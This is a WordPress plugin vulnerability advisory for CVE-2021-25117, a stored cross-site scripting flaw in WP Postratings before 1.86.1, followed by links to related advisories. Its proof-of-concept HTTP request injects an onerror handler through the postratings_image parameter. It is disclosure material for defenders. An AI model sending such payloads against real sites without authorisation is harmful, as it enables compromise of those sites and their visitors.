WP Postratings < 1.86.1 – Admin+ Stored Cross-Site Scripting | CVE 2021-25117 | Plugin Vulnerabilities

Description

The plugin does not sanitise the postratings_image parameter from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Even though the page is only accessible to administrators, and protected against CSRF attacks, the issue is still exploitable when the unfiltered_html capability is disabled.

Proof of Concept

POST /wp-admin/admin.php?page=wp-postratings/postratings-options.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1954
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

_wpnonce=fad0d9fb37&postratings_image=plusminus_crystal\"+onerror=alert(/XSS/);/&postratings_max=2&[SNIPPED]&Submit=Save+Changes

Affects Plugins

Fixed in 1.86.1

References

CVE

Exploitdb

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Park Won Seok

Verified

Yes

WPVDB ID

d2d9a789-edae-4ae1-92af-e6132db7efcd

Timeline

Publicly Published

2020-12-24 (about 5 years ago)

Added

2020-12-24 (about 5 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2024-06-24

Title

WP eStore < 8.5.5 - Coupon Deletion via CSRF

Published

2024-05-30

Title

WP Back Button <= 1.1.3 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2020-03-04

Title

Appointment Booking Calendar < 1.3.35 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2022-04-07

Title

Visual Form Builder < 3.0.7 - Admin+ Stored Cross-Site Scripting

Published

2015-08-11

Title

iframe < 4.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)